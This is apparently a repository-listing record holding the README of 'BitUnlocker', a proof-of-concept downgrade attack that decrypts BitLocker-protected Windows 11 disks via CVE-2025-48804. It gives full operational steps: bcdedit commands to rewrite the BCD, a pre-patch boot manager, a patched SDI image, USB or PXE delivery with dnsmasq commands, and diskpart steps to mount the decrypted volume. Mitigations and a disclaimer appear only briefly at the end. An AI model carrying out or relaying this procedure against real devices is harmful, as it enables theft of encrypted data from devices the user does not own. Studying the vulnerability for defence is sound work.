[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"project-76113":3},{"id":4,"name":5,"fullName":6,"owner":7,"repo":5,"description":8,"homepage":9,"htmlUrl":10,"language":11,"languages":10,"totalLinesOfCode":10,"stars":12,"forks":13,"watchers":14,"openIssues":15,"contributorsCount":16,"subscribersCount":16,"size":16,"stars1d":17,"stars7d":18,"stars30d":19,"stars90d":16,"forks30d":16,"starsTrendScore":20,"compositeScore":21,"rankGlobal":10,"rankLanguage":10,"license":22,"archived":23,"fork":23,"defaultBranch":24,"hasWiki":25,"hasPages":23,"topics":26,"createdAt":10,"pushedAt":10,"updatedAt":30,"readmeContent":31,"aiSummary":32,"trendingCount":16,"starSnapshotCount":16,"syncStatus":14,"lastSyncTime":33,"discoverSource":34},76113,"BitUnlocker","garatc\u002FBitUnlocker","garatc","Downgrade attack for CVE-2025-48804","",null,"Python",206,38,2,1,0,4,6,24,12,4.77,"MIT License",false,"main",true,[27,28,29],"bitlocker","bitunlocker","cve-2025-48804","2026-06-12 02:03:40","# BitUnlocker Downgrade Attack\n\n[![License: MIT](https:\u002F\u002Fimg.shields.io\u002Fbadge\u002FLicense-MIT-yellow.svg)](LICENSE)\n\nA proof of concept for accessing BitLocker-encrypted disks **in under 5 minutes** on fully patched Windows 11 machines through a boot manager downgrade attack, leveraging the SDI vulnerability originally documented as **CVE-2025-48804**. The July 2025 patch fixes this in `bootmgfw.efi`, so any pre-patch `bootmgfw.efi` signed under PCA 2011 can be used for a downgrade attack, provided the target system trusts this PCA.\n\nThis PoC provides two delivery methods: **USB boot** (simpler and recommended) and **PXE boot**. Other approaches relying only on local partitions would probably be possible as well with a smaller SDI file.\n\nThis work builds entirely on the research by **Microsoft STORM** (Netanel Ben Simon and Alon Leviev):\n> [BitUnlocker: Leveraging Windows Recovery to Extract BitLocker Secrets](https:\u002F\u002Ftechcommunity.microsoft.com\u002Fblog\u002Fmicrosoft-security-blog\u002Fbitunlocker-leveraging-windows-recovery-to-extract-bitlocker-secrets\u002F4442806)\n\n---\n\n## Prerequisites\n\n- Physical access to a BitLocker-encrypted device (TPM-only, PCR 7 + 11)\n- The device's Secure Boot database still trusts the **Microsoft Windows PCA 2011** certificate\n- A USB stick (recommended) **or** a Linux machine with `dnsmasq` and an Ethernet cable for PXE\n\n## Step-by-step\n\n### 1. Download boot_patched.sdi from Releases (or build your own SDI file, see below)\n\nPut it in `USB\u002Fsdi\u002F` (for USB method) or `TFTP-root\u002Fsdi\u002F` (for PXE method).\n\n### 2. Prepare the modified BCD\n\nOn the target device, open a WinRE command prompt (hold **Shift** while clicking **Restart**, then **Troubleshoot > Command Prompt** — click \"Ignore this disk\" when prompted for a BitLocker recovery key and click \"relaunch\" if you're also told that the cmd prompt cannot run on a locked device — and if the cmd prompt just won't open, use your own WinPE if you can). Plug in a USB stick and run:\n\n```bat\nE: (or wherever your USB is)\nbcdedit \u002Fexport BCD_modded\nbcdedit \u002Fstore BCD_modded \u002Fset {default} path \\WINDOWS\\system32\\winload_DOESNOTEXIST.efi\nbcdedit \u002Fstore BCD_modded \u002Fenum all\n```\n\nIn the output, find the entry whose description is **\"Windows Recovery\"** and which contains `ramdisksdidevice` \u002F `ramdisksdipath` entries. Note its GUID, then:\n\n```bat\nbcdedit \u002Fstore BCD_modded \u002Fset {GUID} ramdisksdidevice boot\nbcdedit \u002Fstore BCD_modded \u002Fset {GUID} ramdisksdipath \\sdi\\boot_patched.sdi\nmove BCD_modded BCD\n```\n\nPlace the resulting `BCD` file in the appropriate location depending on your method:\n- **USB:** `USB\u002FEFI\u002FMicrosoft\u002FBoot\u002FBCD`\n- **PXE:** `TFTP-root\u002FBoot\u002FBCD`\n\n### 3. Boot the target\n\n#### Option A: USB boot (recommended)\n\nFormat a USB stick as **FAT32** and copy the contents of the `USB\u002F` directory to its root. The USB stick should look like this:\n\n```\nUSB stick root\u002F\n├── EFI\u002F\n│   ├── Boot\u002F\n│   │   └── bootx64.efi        # Pre-patch boot manager (PCA 2011)\n│   └── Microsoft\u002F\n│       └── Boot\u002F\n│           └── BCD             # Your modified BCD\n└── sdi\u002F\n    └── boot_patched.sdi        # Patched SDI with custom WinRE\n```\n\nPlug the USB stick into the target and trigger a UEFI USB boot — either from WinRE (**Use a device**) or by pressing the manufacturer's boot menu key at power-on (F12, F9, etc.). If the USB stick doesn't appear in the list of boot options, look for a **\"Boot from file\"** option in the UEFI boot menu, then navigate to `EFI\u002FBoot\u002Fbootx64.efi` on the USB stick.\n\n#### Option B: PXE boot\n\nThe `TFTP-root\u002F` directory is structured as follows:\n\n```\nTFTP-root\u002F\n├── bootmgfw.efi                # Pre-patch boot manager (PCA 2011)\n├── Boot\u002F\n│   └── BCD                     # Your modified BCD\n├── EFI\u002F\n│   └── Microsoft\u002F\n│       └── Boot\u002F\n│           └── bootmgfw.efi    # Same pre-patch boot manager\n└── sdi\u002F\n    └── boot_patched.sdi        # Patched SDI with custom WinRE\n```\n\nConnect the target to your Linux machine via Ethernet and start the PXE server:\n\n```bash\ncd BitUnlocker\nexport INTERFACE=\u003Cyour-interface>\nexport ABS_TFTP_ROOT=$(pwd)\u002FTFTP-root\n\nsudo ifconfig $INTERFACE 10.13.37.1\nsudo dnsmasq --no-daemon \\\n  --interface=\"$INTERFACE\" \\\n  --dhcp-range=10.13.37.100,10.13.37.101,255.255.255.0,1h \\\n  --dhcp-boot=bootmgfw.efi \\\n  --enable-tftp \\\n  --tftp-root=\"$ABS_TFTP_ROOT\" \\\n  --log-dhcp \\\n  --tftp-max=65464 \\\n  --port=0\n```\n\nTrigger PXE boot on the target — from WinRE select **Use a device > IPv4 Network**, or press the manufacturer's PXE boot key.\n\n### 4. Wait for the SDI transfer\n\nThe boot manager will load the BCD, then start downloading `boot_patched.sdi`. The SDI file is large (~300 MB) so this takes a moment from USB, or **several minutes** over TFTP. A recovery-related message with the SDI path should appear on the target screen while it loads.\n\n### 5. Profit\n\nOnce the transfer completes, a command prompt should appear with the OS volume decrypted and mounted (typically `C:` or `E:`). If it wasn't mounted automatically or you don't want to guess the letter, just run `diskpart` -> `sel vol X` (the one that looks like your encrypted drive) -> `assign letter=C` (or something else) -> `exit` -> profit\n\n### Edge cases\n\n| Situation | What happens |\n|---|---|\n| BitLocker configured with a **PIN** you know | Blue screen at boot — type the PIN blindly and press Enter |\n| Blue screen, no PIN | Target has likely migrated to CA 2023 — press Escape and let the SDI transfer finish anyway, but the BitLocker-encrypted drive will most likely be locked at the end |\n| USB-C \u002F Thunderbolt only | Use a USB-C drive or USB-Ethernet adapter (for PXE) |\n| TFTP file not found (other than garbage Font files which we don't care about) | File names are case-sensitive — rename `bootmgfw.efi` to match what the target requests |\n\n---\n\n## Build your own SDI file\n\nI've included two scripts in `scripts\u002F`:\n- `patch_sdi.py` — builds a modified SDI file from a `boot.sdi` and a `WinRE.wim` file\n- `parse_sdi.py` — parses an SDI file to validate its structure and content\n\nThe `boot_patched.sdi` file provided in Releases contains a modified WinRE.wim where the launch app is `cmd.exe`.\n\n## Unexploitable cases\n\n- **TPM + PIN or TPM + key file** is configured and the attacker doesn't know it\n- **KB5025885 is installed \u002F the boot manager has been migrated to CA 2023** — machines freshly installed since early 2026 likely ship with a CA 2023-signed `bootmgfw.efi` by default. To check, mount the EFI partition and inspect the active binary: `mountvol S: \u002Fs` then `sigcheck -i S:\\EFI\\Microsoft\\Boot\\bootmgfw.efi`. Note that `C:\\Windows\\Boot\\EFI\\bootmgfw.efi` may differ from the file actually used at boot — always check the EFI partition copy.\n- **Non-default PCR policy** — configurations involving PCR 0, 2, or 4 will detect the change in boot path\n- **PCA 2011 revoked via DBX** — if the old certificate has been explicitly distrusted\n\n---\n\n## Mitigations\n\n- **Enable TPM + PIN** — a pre-boot PIN prevents the TPM from unsealing the VMK without user interaction, regardless of boot path manipulation. Keep in mind however that it wouldn't stop an insider who has knowledge of the PIN.\n- **Migrate to Windows UEFI CA 2023 and apply [KB5025885](https:\u002F\u002Fsupport.microsoft.com\u002Fen-us\u002Ftopic\u002Fkb5025885-how-to-manage-the-windows-boot-manager-revocations-for-secure-boot-changes-associated-with-cve-2023-24932-41a975df-beb2-40c1-99a3-b3ff139f832d) to prevent downgrade attacks altogether**\n\n---\n\n## Credits\n\n**Microsoft STORM (Netanel Ben Simon and Alon Leviev)** for the original BitUnlocker research and vulnerability disclosure.\n\n---\n\n## License\n\nThis project is licensed under the [MIT License](LICENSE). See the [LICENSE](LICENSE) file for details.\n\n## Disclaimer\n\nThis repository and all its contents are provided strictly for **authorized security testing and research purposes**. Only use this tool on systems you own or have explicit written permission to test. Unauthorized access to computer systems is illegal. The author assumes no liability for any misuse or damage resulting from the use of this material.\n","BitUnlocker 是一个针对 CVE-2025-48804 漏洞的降级攻击工具，用于在完全打补丁的 Windows 11 机器上快速访问 BitLocker 加密磁盘。该项目利用了 SDI 漏洞，通过替换 `bootmgfw.efi` 文件来实现攻击，支持 USB 启动和 PXE 启动两种方式。其核心功能在于能够在不到五分钟内解锁 BitLocker 加密，适用于需要物理访问且目标系统信任 Microsoft Windows PCA 2011 证书的场景。项目使用 Python 编写，提供详细的步骤说明，并基于微软 STORM 团队的研究成果。","2026-06-11 03:54:32","CREATED_QUERY"]